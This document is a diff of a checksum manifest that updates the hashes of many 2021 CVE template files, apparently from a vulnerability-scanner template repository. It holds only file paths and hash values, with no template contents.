+http/cves/2021/CVE-2021-21803.yaml:2ef3cf3a7031fe7de22e837cec7fab43ddd43fca +http/cves/2021/CVE-2021-21805.yaml:eb1766b4e6c62d3ff6829821a5e944d1bb21babc http/cves/2021/CVE-2021-21816.yaml:520bc9b9b2480f3d3745af02a4a646d3cc95a1bb http/cves/2021/CVE-2021-21881.yaml:314c6a82741362db622de79002bdaaa699d77761 http/cves/2021/CVE-2021-21972.yaml:3cb1d3e5a750dee527ad05a5dde9606adf3534da http/cves/2021/CVE-2021-21973.yaml:853e9759bf3850a3c10bf2d32c0817837c5a9296 http/cves/2021/CVE-2021-21975.yaml:7f5af74dfddf9aad00a337757a5d13c48d2e32a5 -http/cves/2021/CVE-2021-21978.yaml:0b85fe6b593abe4842dcee884c102b70e77b1082 +http/cves/2021/CVE-2021-21978.yaml:a4ca0080ca54e4fb2dd60df5a9b22016d5dc35c9 http/cves/2021/CVE-2021-21985.yaml:de275a6d1f73b71650461305255ce4033fb0f6c3 -http/cves/2021/CVE-2021-22005.yaml:4d60e11bb24e7646d6e594e555473e749eac2a06 -http/cves/2021/CVE-2021-22053.yaml:9349ec3ab506e0c4e2b2b9fb25d28fb8b6ce977d -http/cves/2021/CVE-2021-22054.yaml:9fb80f3816afec6b9f870dd2f8fd806643e4e834 -http/cves/2021/CVE-2021-22122.yaml:f2f6bb0ddb5ece77618aa0a30365b2b311c40234 -http/cves/2021/CVE-2021-22145.yaml:6a0c3e42ebe2d8aafb61acc9a7b8dae2b4a6d4d1 -http/cves/2021/CVE-2021-22205.yaml:9e49c70f067bba5a2e7eeed24798245c195838f6 -http/cves/2021/CVE-2021-22214.yaml:98b7cc80571479e1538bbadd78907e8ad821bdff +http/cves/2021/CVE-2021-22005.yaml:fe325a40c57f48bb4882a1fd996574deeb165879 +http/cves/2021/CVE-2021-22053.yaml:d8208a8a3043a154e1a4fe7f8509addc209f8875 +http/cves/2021/CVE-2021-22054.yaml:c1b2c935bc6b3a81302c81bfa50c0f6223aa1b1f +http/cves/2021/CVE-2021-22122.yaml:07ca11d8042ad99ed5aa7c541c736b1402fd7a5d +http/cves/2021/CVE-2021-22145.yaml:b4f6a6a818fbd74362c332552aabcf5bad37a688 +http/cves/2021/CVE-2021-22205.yaml:3bc9cd57d614ef6a973445c42055cf5697201c94 +http/cves/2021/CVE-2021-22214.yaml:7064fb2447f553a11ac940d7873755f0a31d2bcd http/cves/2021/CVE-2021-22502.yaml:0222d90f5cb9381a29406ba64373c7a401ddaf0f -http/cves/2021/CVE-2021-22707.yaml:ea74ca24fcbceee325d017fa9214571d11240d80 -http/cves/2021/CVE-2021-22873.yaml:5beb5f7420b748951d79cb8fbac8a27fc281488a -http/cves/2021/CVE-2021-22911.yaml:048be356528c7c29a31ac1ac3281292f1b07c0ba -http/cves/2021/CVE-2021-22986.yaml:06a290cbb4d4bafb585a68270201fe178561c9e2 +http/cves/2021/CVE-2021-22707.yaml:5f16e2f4524a176ad6521e6b3d80e5533447c44d +http/cves/2021/CVE-2021-22873.yaml:88b0b5dd1d60b31f5bb752d3931fd07e8bdf72c3 +http/cves/2021/CVE-2021-22911.yaml:6de8d0845adb4ef46c6447a4326a35cc946dd823 +http/cves/2021/CVE-2021-22986.yaml:31f5e400fc950bc34cf66eca3460919816e6f71c http/cves/2021/CVE-2021-23241.yaml:e1888868bf2770805a3f0cb3cae6820883bf9754 -http/cves/2021/CVE-2021-24145.yaml:a82b4e67bfbd496b6ce1b0d8378f81dacd5a0af2 +http/cves/2021/CVE-2021-24145.yaml:e6e82aec5f5af7635fb64950a94cc6b5ede67c28 http/cves/2021/CVE-2021-24146.yaml:30f30afaad0e48ad7394e8f3bc658e3c52ea375d http/cves/2021/CVE-2021-24150.yaml:bc46ae35079f405b539824e978457a5726b272ed http/cves/2021/CVE-2021-24155.yaml:fc725c5de1693bf4594d37b2b83d936127f2ff94 -http/cves/2021/CVE-2021-24165.yaml:04c032423eb748616d2611c0439257bbd9284bb7 -http/cves/2021/CVE-2021-24169.yaml:3b378862db16225c42dcb88825dbb95e4b2c8fcc +http/cves/2021/CVE-2021-24165.yaml:cf99607da08b31da4b450f3c79ab66d2a78f4270 +http/cves/2021/CVE-2021-24169.yaml:6ab7986da54e496ed7901604980a6b62e95d0540 http/cves/2021/CVE-2021-24176.yaml:08064c398c90c5743dcd737492b44532ad8ae609 http/cves/2021/CVE-2021-24210.yaml:f3c92e19e3e4ecb701c23031ba681bc0bebbed93 -http/cves/2021/CVE-2021-24214.yaml:121189d0c2b9ce9daeb511e05c4ba18da2da9cd2 -http/cves/2021/CVE-2021-24215.yaml:fd49e8ca44ef839c651006537212074a832aeafc +http/cves/2021/CVE-2021-24214.yaml:373a596e522804f9a9997fff30ef0f2acf94cc66 +http/cves/2021/CVE-2021-24215.yaml:37ab6917498b5938e472925d78a9ffc51df8ef4b http/cves/2021/CVE-2021-24226.yaml:e3cce68f878058a5b883337446b715c4638ea5b2 -http/cves/2021/CVE-2021-24227.yaml:d825309df0abf4a54318fc13a1fa1ffb0896caaf -http/cves/2021/CVE-2021-24235.yaml:57c461d4f1161b23cc0275237347f99886ee2245 +http/cves/2021/CVE-2021-24227.yaml:9a69a16794dbe8c405cb180f644fdfc4905907e1 +http/cves/2021/CVE-2021-24235.yaml:3cebd4f0ff47c09aa044f04f2a2a5556a270c627 http/cves/2021/CVE-2021-24236.yaml:b23f084964832d51ab3f4af593232ecdde5e6586 -http/cves/2021/CVE-2021-24237.yaml:ee414764403594d1eb17e3c75248f7981be30647 -http/cves/2021/CVE-2021-24239.yaml:3ba11b811447f546d379ae433df958844f08df7b +http/cves/2021/CVE-2021-24237.yaml:3b933f6017ed933c7dd0e2bdb009e8a4380007fc +http/cves/2021/CVE-2021-24239.yaml:8675928c6b117809c4be9f080f0e3b90d3805e31 http/cves/2021/CVE-2021-24245.yaml:7bb1fc8f1f066614f4acc1287336318999c2b9ab http/cves/2021/CVE-2021-24274.yaml:fdc8b3c848faeec90768ba04b9afd444ada6ed29 -http/cves/2021/CVE-2021-24275.yaml:d1acccef3badf246eeb435791fd2b6f5a226f539 -http/cves/2021/CVE-2021-24276.yaml:5b68df559fa465a4f8e22f0166773c8a8d53f469 -http/cves/2021/CVE-2021-24278.yaml:7837831aa12b4bb256ff897217417829bf146f1c +http/cves/2021/CVE-2021-24275.yaml:a1a605d2709c989d4b282a55c7b6420cb93f6f41 +http/cves/2021/CVE-2021-24276.yaml:14ab150dfbb0d9e69f444b87617e45e5d7c85fba +http/cves/2021/CVE-2021-24278.yaml:d0911c2e74a071f6ed35ec02836ae6f952343772 http/cves/2021/CVE-2021-24284.yaml:8e0a2d867fefe5278478906204c54407d2c52981 -http/cves/2021/CVE-2021-24285.yaml:7be3795857e1e167e9cadb6ba89f1404ceedd3db -http/cves/2021/CVE-2021-24286.yaml:feed87a979080f2b9a28d592ceace161b1f5fffd -http/cves/2021/CVE-2021-24287.yaml:b226b9989d0add703e9f949168ac27a5f4063f96 -http/cves/2021/CVE-2021-24288.yaml:78780d0e5af16199bd2f7030bf0064a359c23855 -http/cves/2021/CVE-2021-24291.yaml:d0aa7463cec83fe146221a59d2c3746bfa5ff495 +http/cves/2021/CVE-2021-24285.yaml:c25f3c43e4dacddb0dbec3562d7a32f46f09a59c +http/cves/2021/CVE-2021-24286.yaml:28e87a794c7aed34e30970461c7d6f4d5f9ca3cc +http/cves/2021/CVE-2021-24287.yaml:116274ad6f0c3249da6aed5bcf9662462615b117 +http/cves/2021/CVE-2021-24288.yaml:fb8bb41722f495b69d91278ed06ea186c2aa2fb4 +http/cves/2021/CVE-2021-24291.yaml:dad4f96eb0c16f1545431c9df93842305f26a1ae http/cves/2021/CVE-2021-24298.yaml:ed0a99a0ae34549d1ba0cc1d1fc655a059ed6085 http/cves/2021/CVE-2021-24300.yaml:4e5f08f42588d8fc55a23ae949d761e9e9297f12 -http/cves/2021/CVE-2021-24316.yaml:98172efa234e09a71c0e52c75fa2ad1da06fe01f -http/cves/2021/CVE-2021-24320.yaml:c4abb3477ab9762de61ad0cea25f1a7355e501f8 +http/cves/2021/CVE-2021-24316.yaml:e878005065bf4b6e222377ee880aef14d3342ebb +http/cves/2021/CVE-2021-24320.yaml:064d8840bd23e0bd74eee232616d5b3395229aef http/cves/2021/CVE-2021-24335.yaml:7e6548d5b8fd76c6cf9ebb4af47dd7f563999e1a -http/cves/2021/CVE-2021-24340.yaml:c3fcf4701be3f06962cc6517495e829956d48535 +http/cves/2021/CVE-2021-24340.yaml:56f924a33ea2e02a7da8c72d8a98eae01d8286dd http/cves/2021/CVE-2021-24342.yaml:45cf70e75e4e37166296cc7d2db4eee6b266a111 -http/cves/2021/CVE-2021-24347.yaml:603b7a6f61ca06c0ec6fb28228e7acdb922efce5 -http/cves/2021/CVE-2021-24351.yaml:06a47bf975372ca45adff762da99a08b0fdb05b4 -http/cves/2021/CVE-2021-24358.yaml:1a634c2b45c62248b4ad9a3b343e5a1e9b5cb648 +http/cves/2021/CVE-2021-24347.yaml:a7b198fb418307f63ca9acf33e682de27d972f5f +http/cves/2021/CVE-2021-24351.yaml:5c8ef0e8c6bc5f6b7d9af51dcb39649fe73c975a +http/cves/2021/CVE-2021-24358.yaml:16d1d4314449c6b068c33c2130e3fcb0db7f165c http/cves/2021/CVE-2021-24364.yaml:462271144765c14ca8788b33496a643d7ff7dcf3 http/cves/2021/CVE-2021-24370.yaml:480c194476d40e71e0f58139dbac79cfcca559ba http/cves/2021/CVE-2021-24387.yaml:9d10f02a47e4a06f90f4f06a24f24e6177b962ec http/cves/2021/CVE-2021-24389.yaml:42ad59611f74158ae872570a997c48530f1b987f http/cves/2021/CVE-2021-24406.yaml:619168311788c421c9975c3b5285c06ade2c2dd7 http/cves/2021/CVE-2021-24407.yaml:1f40116c29a201347b75897f4ae36497de80c72a -http/cves/2021/CVE-2021-24409.yaml:17dbcd3cbc26cd1e7c1127e9d1a17e36ee8e7197 -http/cves/2021/CVE-2021-24435.yaml:4c9854d4be1ecd0bc0935ce161352a2301f68d8c +http/cves/2021/CVE-2021-24409.yaml:2d79942f20f2565635b069191b9faf3ecc4e48ce +http/cves/2021/CVE-2021-24435.yaml:15387d29390d1ec6a1c5fb8f054dd823a10cef2f http/cves/2021/CVE-2021-24436.yaml:602fa742a1830cb1f39707d935e978c4af32b0f6 -http/cves/2021/CVE-2021-24442.yaml:5e257a18bef0eeb7e79d93772aa8889139f87747 +http/cves/2021/CVE-2021-24442.yaml:03047b68e4fab0c5aee20d5c8daeb94e7ec7045c http/cves/2021/CVE-2021-24452.yaml:83b001cad29a915b555b4ffc9e04f33a8e80637a -http/cves/2021/CVE-2021-24472.yaml:619b8e42c91130942587995b934b9f6cc591faee +http/cves/2021/CVE-2021-24472.yaml:4dcca0eca6199a7b117013f82857bc7bd951533f http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 -http/cves/2021/CVE-2021-24495.yaml:a12f27c95cce7beea89646d84b37f514056883cd -http/cves/2021/CVE-2021-24498.yaml:19c1037c1be634ce077d5e4bacc4eb8de8eff0bc +http/cves/2021/CVE-2021-24495.yaml:9776ce8d7642c38c752b5277411ae5ffd5d822f8 +http/cves/2021/CVE-2021-24498.yaml:e68e97cd91a0f778434094f485c1a13259df7149 http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 -http/cves/2021/CVE-2021-24510.yaml:8c7148382e6ee611f343cf28583c3bb7b4e0ee7a -http/cves/2021/CVE-2021-24554.yaml:d81b4b96eb5938723fef5c8b4ff3c6b714601a31 -http/cves/2021/CVE-2021-24627.yaml:430e5307771ec9c27cfbd2e8cd9850414e7aff0f -http/cves/2021/CVE-2021-24647.yaml:c120dcd315b69a16a6283e0aa494712ed21ec48c +http/cves/2021/CVE-2021-24510.yaml:ba66a091f2fa2c173e0cde1cbcb0c7e7e412f462 +http/cves/2021/CVE-2021-24554.yaml:3d14e85b29d926a1bfdd0408646468592755c2e4 +http/cves/2021/CVE-2021-24627.yaml:d08981841f2aadf45be7bfb2b624c740287bb846 +http/cves/2021/CVE-2021-24647.yaml:57e0c23fd8a53f4853ebd1bd8784bbd17ff174f1 http/cves/2021/CVE-2021-24666.yaml:a25e0c97cdff1a1e807b28a99a00ef033722a6ac -http/cves/2021/CVE-2021-24731.yaml:202d1b9b3252ed7985d888b8e5283366e2283c91 -http/cves/2021/CVE-2021-24746.yaml:3d2a0e78462718157b6447e2dd99377085a8513b -http/cves/2021/CVE-2021-24750.yaml:a5f2bf989b1fab3e654b921557278cb5738f2a37 +http/cves/2021/CVE-2021-24731.yaml:3fb74c68ec27217782f13c9dcd2cbdcec90de59b +http/cves/2021/CVE-2021-24746.yaml:e817bdd5678f8a761303e95377fa9fd8c49bd351 +http/cves/2021/CVE-2021-24750.yaml:9a94ffcf36a259a6cd2de100ccdb877dd33b1619 http/cves/2021/CVE-2021-24762.yaml:33c2e8efc337a1f06768b1e6047d6a02c32e9e8a http/cves/2021/CVE-2021-24791.yaml:483a228643827bac8b87d83b78865d8f395bfd39 http/cves/2021/CVE-2021-24827.yaml:61c481595a7dabb304fd1c0cec9c7cd6a6a39684 -http/cves/2021/CVE-2021-24838.yaml:0cc51d4d1c10c2f4af870aa9b636013be8130a28 -http/cves/2021/CVE-2021-24849.yaml:cf4dc11f4c272ed7159a418c8fec48d38bebc518 -http/cves/2021/CVE-2021-24862.yaml:c12546a4335f7196f4b2813946601c2f74e79cca -http/cves/2021/CVE-2021-24875.yaml:af4472bf9db8cc8423ae0c3b0ebe71c3767829bc -http/cves/2021/CVE-2021-24891.yaml:d25791df32146893bfb3dc68d5b0175a4a53e2ee +http/cves/2021/CVE-2021-24838.yaml:3e324388696bcd84d8cff8c5354abd28c3db3bcc +http/cves/2021/CVE-2021-24849.yaml:531bc837b67305d9b5488d191ab5bb1e88b9c8bd +http/cves/2021/CVE-2021-24862.yaml:18b88de1f2f004a26001bb93fc8072ec4f7a3372 +http/cves/2021/CVE-2021-24875.yaml:26b9421ad311a64c3696e1f27b6a87c2b2e64d8f +http/cves/2021/CVE-2021-24891.yaml:95ace65f00bc1b4f18f34b95b253c69f80192c35 http/cves/2021/CVE-2021-24910.yaml:578aae9854f832a8e526a7a07c7d9b1557949de3 -http/cves/2021/CVE-2021-24915.yaml:6bcbcac03cdf23b16667b90d3aa28722558fa819 -http/cves/2021/CVE-2021-24917.yaml:ff3bab51dcfdb188e0827434b16640e438278c6a -http/cves/2021/CVE-2021-24926.yaml:57977ea4fe89af198eeecde8eae9bb63c6f40fd6 +http/cves/2021/CVE-2021-24915.yaml:8e2119bb3b35a4519c26947cf9e297ef976a134a +http/cves/2021/CVE-2021-24917.yaml:08f0ddeb207f275c090ca54b50434e696993b32b +http/cves/2021/CVE-2021-24926.yaml:ec83411f15a40fabfc7e893063d32fc7178a37dc http/cves/2021/CVE-2021-24931.yaml:fee82426c5f1a5cbeb6c269ab91086e1026d14f6 -http/cves/2021/CVE-2021-24940.yaml:3d017792835b350d26b0023c6a177f14324e7cb4 -http/cves/2021/CVE-2021-24943.yaml:5317340c8fb0b9a6fb64ba613a8648948c6a0ae6 -http/cves/2021/CVE-2021-24946.yaml:9da6cde41fdf8ae8495138ea90a92f416059221e -http/cves/2021/CVE-2021-24947.yaml:6a8cf48f029ac0263d8ac5c55b16d33fc0411d62 +http/cves/2021/CVE-2021-24940.yaml:9b94c2a20503d658ae777df0cdf3168f25a936fb +http/cves/2021/CVE-2021-24943.yaml:798239f2034a244734927cb4c21f1511289eb724 +http/cves/2021/CVE-2021-24946.yaml:a1b408e926b8579f4ba65ae73a1ab85d6962bb2d +http/cves/2021/CVE-2021-24947.yaml:5d64893847435d3bf297bf280f24791f4cd58c51 http/cves/2021/CVE-2021-24956.yaml:3d8d0c0a4088c26ef4d5637c6e9f67b19539cb01 -http/cves/2021/CVE-2021-24970.yaml:a184cc1dfb950bd077a82bf0fd556fa04fceb09c -http/cves/2021/CVE-2021-24979.yaml:844fa0496f0d95c411d24813296d2cd16472de35 +http/cves/2021/CVE-2021-24970.yaml:43003e6dd3a06352c96df0c73482095e8e95a683 +http/cves/2021/CVE-2021-24979.yaml:b5cad9deea201ca00b277758a544a75b35d45db3 http/cves/2021/CVE-2021-24987.yaml:06ec87f0d9dad1a08870b903b897645a4114cca6 http/cves/2021/CVE-2021-24991.yaml:4bc4eec76c21b3f68454f49c72adff65d3a817b5 http/cves/2021/CVE-2021-24997.yaml:1824a3b9d5a403431c731e636e0365e882b2e145 -http/cves/2021/CVE-2021-25003.yaml:8cf988dd1b3af7db4db432f71a28c1bfae849f1f -http/cves/2021/CVE-2021-25008.yaml:186b0b01951f649e4cdce8c031b3932b9db8f818 -http/cves/2021/CVE-2021-25016.yaml:b324539bafd7c8b4731831a526382f8240bfc1bf +http/cves/2021/CVE-2021-25003.yaml:a8d3634ad0c75055bb3d751f846e3a586e54e7ad +http/cves/2021/CVE-2021-25008.yaml:08a6fdd6b7c3c743fc1b023df5905a53e90348eb +http/cves/2021/CVE-2021-25016.yaml:13eca21533bf781856bc7ecd416bdd8abf804653 http/cves/2021/CVE-2021-25028.yaml:533752557ff220a1bd422d2fb856f1ffb91b9969 -http/cves/2021/CVE-2021-25033.yaml:f1fb5b88482121fb7fbcd103037c7f786140e8f1 -http/cves/2021/CVE-2021-25052.yaml:244570a7095d59bcd88ac48b88fd21fee21bd97b +http/cves/2021/CVE-2021-25033.yaml:418b528ea6c7886e28b79f4f7673c158e9216acb +http/cves/2021/CVE-2021-25052.yaml:76f2ab4b9468c2d95ef7165c8e45620ccd38e4fa http/cves/2021/CVE-2021-25055.yaml:f7703e52995b4903f92459e9ef95df26f9bed1a2 -http/cves/2021/CVE-2021-25063.yaml:028afc6144e0860af778b9b357617b0cb11eb9cc -http/cves/2021/CVE-2021-25065.yaml:6402c0d4528380b364f01e1c93d8a97e71459e96 -http/cves/2021/CVE-2021-25067.yaml:7a404629c90f4092f6c0371e7d71929fa1781695 +http/cves/2021/CVE-2021-25063.yaml:821b39a53a40c8ffa4ba2180a1ef6aefa92306d5 +http/cves/2021/CVE-2021-25065.yaml:11f959dceee9ebf18badd3b3a811dea7709bb1b1 +http/cves/2021/CVE-2021-25067.yaml:ed26c9fc4b409093178bf53f71c0269b444a6ed1 http/cves/2021/CVE-2021-25074.yaml:5a380fe97e9ed2a623bb5d9a76a78a9b9581a041 -http/cves/2021/CVE-2021-25075.yaml:a718dee47ee127c7e76cf3f6c61d0e902e499c06 -http/cves/2021/CVE-2021-25078.yaml:1de2dee76dcfd2b67a3a22434d17f20797354517 -http/cves/2021/CVE-2021-25079.yaml:d9e69810b9b97575f0cfd5238d90dd74db3a4b82 -http/cves/2021/CVE-2021-25085.yaml:afc0a0d77bd40c3ae606306bc8ab728490afd270 -http/cves/2021/CVE-2021-25099.yaml:96db4715cf61486a1dbf6bfa99db64b5ee658869 +http/cves/2021/CVE-2021-25075.yaml:39e68482ba95ae484dbef4d943f3eeeef1d76c1e +http/cves/2021/CVE-2021-25078.yaml:6b6bce6eb2304b9669b02daf33b5beb1d08de327 +http/cves/2021/CVE-2021-25079.yaml:c37bcd8632bac20013d43f089a769bdff04eca2e +http/cves/2021/CVE-2021-25085.yaml:a7de237e23ca9d8f5ed0d68dc839956519456fa8 +http/cves/2021/CVE-2021-25099.yaml:c15223269d9bd03eadab6821d3b09267804d0ed4 http/cves/2021/CVE-2021-25104.yaml:78f06eb1f70bad226faeeb2acd5b31bb5ee06fa3 -http/cves/2021/CVE-2021-25111.yaml:4711c0203e3e6926f07508ca55dcc6d338b9eb4a +http/cves/2021/CVE-2021-25111.yaml:6b0f40ebc6836b0910f632f9e4a9610a6f506f3e http/cves/2021/CVE-2021-25112.yaml:863f1f1178f01d7d278802acb2490d230f2c28b5 -http/cves/2021/CVE-2021-25114.yaml:10297fac562f4e9b4758c40509edd8eab28810f1 +http/cves/2021/CVE-2021-25114.yaml:5b5fc3cb6fb7099595c72d0ef22782c7da5cf94b http/cves/2021/CVE-2021-25118.yaml:bb89b24586f268eeed7c70d7677aa51abb677f32 -http/cves/2021/CVE-2021-25120.yaml:180bff131d7b46afe0cbc57424767b9cad725a83 -http/cves/2021/CVE-2021-25281.yaml:bde5a9f73b250b872edc034cbaa883533e6b672d -http/cves/2021/CVE-2021-25296.yaml:eebdd9e01f7de42eac8b0acc73ef7737c22d6dc3 -http/cves/2021/CVE-2021-25297.yaml:798c5dd2384ee37d90e12cc73b40dd17203a5e3a -http/cves/2021/CVE-2021-25298.yaml:a1bd4f65462afa430f096448b5615192e924dc52 -http/cves/2021/CVE-2021-25299.yaml:0bc0073511338a0dc2150935c3b28c868dd2a210 -http/cves/2021/CVE-2021-25646.yaml:702066b84f547c4a34a68f2dc9e154ea75eb1089 -http/cves/2021/CVE-2021-25864.yaml:3eb5887c70ebe0982738c1f4ad76a60d4f2be8c5 -http/cves/2021/CVE-2021-25899.yaml:d3fd60e8943976e7cc7f442b67bae6e189b172ce -http/cves/2021/CVE-2021-26084.yaml:6d75e0a15be35914d87e6629398e42d91e7ea4a3 -http/cves/2021/CVE-2021-26085.yaml:5ca91bf2f3dddfa7d0b0daac72aecd1d601b1f7d -http/cves/2021/CVE-2021-26086.yaml:55727080522c5f3da99faac2205bfd0ea517ee77 -http/cves/2021/CVE-2021-26247.yaml:1f518e180f0a5b4ebde579d3c089c911332fcff0 +http/cves/2021/CVE-2021-25120.yaml:ef1129f3d01121e72cc251f4907dd31121f483f3 +http/cves/2021/CVE-2021-25281.yaml:926d40b41dca38380afe266c4747a494831e1d82 +http/cves/2021/CVE-2021-25296.yaml:747b671ba0e06ff9f7a235ac299f30d4aa099a32 +http/cves/2021/CVE-2021-25297.yaml:52682c3fea52165dc90b59148a0698dce7ec8358 +http/cves/2021/CVE-2021-25298.yaml:0babaec0f4066df9e4caef4eb34b191becf207c8 +http/cves/2021/CVE-2021-25299.yaml:63f77b7b22f20671c58467d9ef2a3826eb2dba51 +http/cves/2021/CVE-2021-25646.yaml:2218d09cd6aee5362f65fb76eee19ff15b8a7b6e +http/cves/2021/CVE-2021-25864.yaml:1ece5f67939fdf5bd24bb6b8b80a4d675100bbf1 +http/cves/2021/CVE-2021-25899.yaml:f84c990490b6e778e06b4abe4673f22c8c954369 +http/cves/2021/CVE-2021-26084.yaml:f13d57a5d654aaabcb6d3548e4ab7e6f4d9c5f4a +http/cves/2021/CVE-2021-26085.yaml:131be1d64bcb55e9a0059917d137c2b2ef5764a8 +http/cves/2021/CVE-2021-26086.yaml:d96d98b05336c9039bdedb473ff20e12255102fa +http/cves/2021/CVE-2021-26247.yaml:daa7279c49fb11ec4e6fcf38895ee3e23cef5d43 http/cves/2021/CVE-2021-26292.yaml:29180065c333be64a12dc3343a26bf290917d6c0 -http/cves/2021/CVE-2021-26294.yaml:e550c9d57e52e8366c6295275e98b23aa79afe3b -http/cves/2021/CVE-2021-26295.yaml:4bf9393f9a6eaa6b1e17ecd3bdc5a21c35ed1c3f +http/cves/2021/CVE-2021-26294.yaml:15b5b6c816a5b0c96e4862d79c168a57e4a41b58 +http/cves/2021/CVE-2021-26295.yaml:760a664616356d218f9d8b23a5e26619132182a9 http/cves/2021/CVE-2021-26475.yaml:287c333e6e6c35e539e84260d37699f19044b24b -http/cves/2021/CVE-2021-26598.yaml:a7a022621420afd7d50b02f94d6f716ed9b48f4c -http/cves/2021/CVE-2021-26702.yaml:73a879a6b590518960d2ab86a8536e1c8caa89b2 -http/cves/2021/CVE-2021-26710.yaml:fa141549f9353b92653492ffb1a5aaf44fe7509b -http/cves/2021/CVE-2021-26723.yaml:8923238ffe8b311a03b85f9b75a2b0002ffa8b27 -http/cves/2021/CVE-2021-26812.yaml:45e106eff3baaf5ac92ab50ec665eb85af894330 -http/cves/2021/CVE-2021-26855.yaml:2b830119668905813c31be417ed819c5c6f29081 -http/cves/2021/CVE-2021-27124.yaml:2a910bac6c0d2944f52f5aad7d3857f778bf1930 +http/cves/2021/CVE-2021-26598.yaml:564c72e7ded58474a970f8bb81499d37bec2eb6f +http/cves/2021/CVE-2021-26702.yaml:38b4c6ea7314d91de56621916deab69db896521f +http/cves/2021/CVE-2021-26710.yaml:62c7e47d0b5631d581a26268dc2fac090da415df +http/cves/2021/CVE-2021-26723.yaml:485872f7cfd865bf4f7974965ab17efaf6fdcf78 +http/cves/2021/CVE-2021-26812.yaml:59f135266598da23e8ccbc78b6800509764ef731 +http/cves/2021/CVE-2021-26855.yaml:eebc2b4f2b4bdce6eb1f3939ba31f790416289b4 +http/cves/2021/CVE-2021-27124.yaml:1629ecb945e3672b3d085110841767983165201f http/cves/2021/CVE-2021-27132.yaml:fcfd3632c51f9fc6add57cb17f22c786e429bc9f -http/cves/2021/CVE-2021-27309.yaml:eda786389e6cde2a47d6e49b8cb435c8a21ed820 +http/cves/2021/CVE-2021-27309.yaml:a3a9b515c775670ff42193b413141bdb9a093baf http/cves/2021/CVE-2021-27310.yaml:6c130175ed546ffc7a70969fe956b16deee4f64d http/cves/2021/CVE-2021-27314.yaml:5a5d404050557c21d88703fe905484af36df4d1c -http/cves/2021/CVE-2021-27315.yaml:face5054c6caa156f4773fee8a2879026b1f72dc +http/cves/2021/CVE-2021-27315.yaml:74654fa6664463c75851f08e5fd40fa498c1e16e http/cves/2021/CVE-2021-27316.yaml:75fe1ce09716aeebd01d4e93523b46c13ac35002 -http/cves/2021/CVE-2021-27319.yaml:19747527a4e69e2db18dd51c4badffb67c3b0710 -http/cves/2021/CVE-2021-27320.yaml:f039210918858c7283d805644a6e6b67e5250e66 -http/cves/2021/CVE-2021-27330.yaml:e1283aff7b6c5f9a8f7c2348081195c2b155657e -http/cves/2021/CVE-2021-27358.yaml:e26586182b33cde07cf9d3315e698ad3305d1231 -http/cves/2021/CVE-2021-27519.yaml:e16b5f5faee4d4125580d4d659bad10f864b643c -http/cves/2021/CVE-2021-27520.yaml:3d1e280d9c78f42dfdd23139370509eb83631355 -http/cves/2021/CVE-2021-27561.yaml:fba16ba46cbc7b1a0830fed4fafe9b7a628f12cc -http/cves/2021/CVE-2021-27651.yaml:b3e18b36b730159a342d259fdd743c5cd3787de3 -http/cves/2021/CVE-2021-27670.yaml:c0bebbeea8ef882d6cf84b4ae5134c54b76823e6 +http/cves/2021/CVE-2021-27319.yaml:4ac703375c9f54452dae10e45521a9e9e275d3bf +http/cves/2021/CVE-2021-27320.yaml:8892536ec8bde5ba1d2a36bafdca53d74a970dc6 +http/cves/2021/CVE-2021-27330.yaml:7c15e8c428cf23f33e9417b848aa1548bb097aba +http/cves/2021/CVE-2021-27358.yaml:8a9b766705b30e318f54311f1ac6ce99298e6c1d +http/cves/2021/CVE-2021-27519.yaml:1e478365ef619cb1325a309573643277445efaec +http/cves/2021/CVE-2021-27520.yaml:460e5969818aa1cf1a07bd3688404dca0ae3ebf0 +http/cves/2021/CVE-2021-27561.yaml:48b8e25de3c4b67ab3c08074a6392f8b79b56d21 +http/cves/2021/CVE-2021-27651.yaml:fb07d45f4dea3a695c3ba1cf1b17282568f3e11d +http/cves/2021/CVE-2021-27670.yaml:ccc4db0cad2f1e302de60259feaf399494056e85 http/cves/2021/CVE-2021-27748.yaml:1dc51db3b3d3be24e2be6387448b7a662531edb5 -http/cves/2021/CVE-2021-27850.yaml:7136a99277bcca5f5c44d9e3816a5ff4f379e16a -http/cves/2021/CVE-2021-27905.yaml:1dc1c48d36bb3d28a84df30cd1199ab100b86918 -http/cves/2021/CVE-2021-27909.yaml:e43bd5d94d972050a9fdafc20a77e3d096488e0e -http/cves/2021/CVE-2021-27931.yaml:1170d3c4da4c2fe8817a4658387df31c991d91c1 +http/cves/2021/CVE-2021-27850.yaml:6d39edaca13ab611f58c51ec72e93ef55b05dfa5 +http/cves/2021/CVE-2021-27905.yaml:d83ca42e2d53248b98aff534b7ba88f52858d1e8 +http/cves/2021/CVE-2021-27909.yaml:788c3fd40aa42d55bb56f89c662a03cb92649b7f +http/cves/2021/CVE-2021-27931.yaml:8dacc9bb81db5a5aeb0dffde8a034619108d38c8 http/cves/2021/CVE-2021-28073.yaml:b69885510093cff31b667b35c1004583ec9fbbf2 http/cves/2021/CVE-2021-28149.yaml:0a69b168f8c598056a57c29b2c4225737cb83bf0 -http/cves/2021/CVE-2021-28150.yaml:a047c5c5dfd214ce39b821b16fbec59af26808a1 +http/cves/2021/CVE-2021-28150.yaml:5c44f0523781a0f4b2d9fb25b5c1e9060126b8df http/cves/2021/CVE-2021-28151.yaml:e126ac73a0c4ae22fe04e5a1374c2fc480bc1367 -http/cves/2021/CVE-2021-28164.yaml:4d1b60d97e4a2b1de4b44577a09bc5e5c44ee3a5 -http/cves/2021/CVE-2021-28169.yaml:761381f1b70418f3563de424d3fba23f25dbc35f -http/cves/2021/CVE-2021-28377.yaml:dad1298461bccf6fadec868718bac767ea649a22 -http/cves/2021/CVE-2021-28419.yaml:46111b613e301cab6f973ee1f83a72b017dfd90f +http/cves/2021/CVE-2021-28164.yaml:c495e9844b37c21638f8ce764c2f65fd67ffd47d +http/cves/2021/CVE-2021-28169.yaml:2a2b83e42d9a0d4016f953c9a03cf66ca77395fd +http/cves/2021/CVE-2021-28377.yaml:a14614a7091a6dae30ad0d7c77c00899100a0981 +http/cves/2021/CVE-2021-28419.yaml:81ea7bd96652f972ce9b5e1cfbd77f7d160ed9c6 http/cves/2021/CVE-2021-28854.yaml:dd2007f9a927a86fa6765c9534a1259eb3c46f86 http/cves/2021/CVE-2021-28918.yaml:20422a3d75001b729c00e4a3c90e9ed033fb4349 -http/cves/2021/CVE-2021-28937.yaml:33b9de2830337ef70cd3bc96a964a2926b5d34af 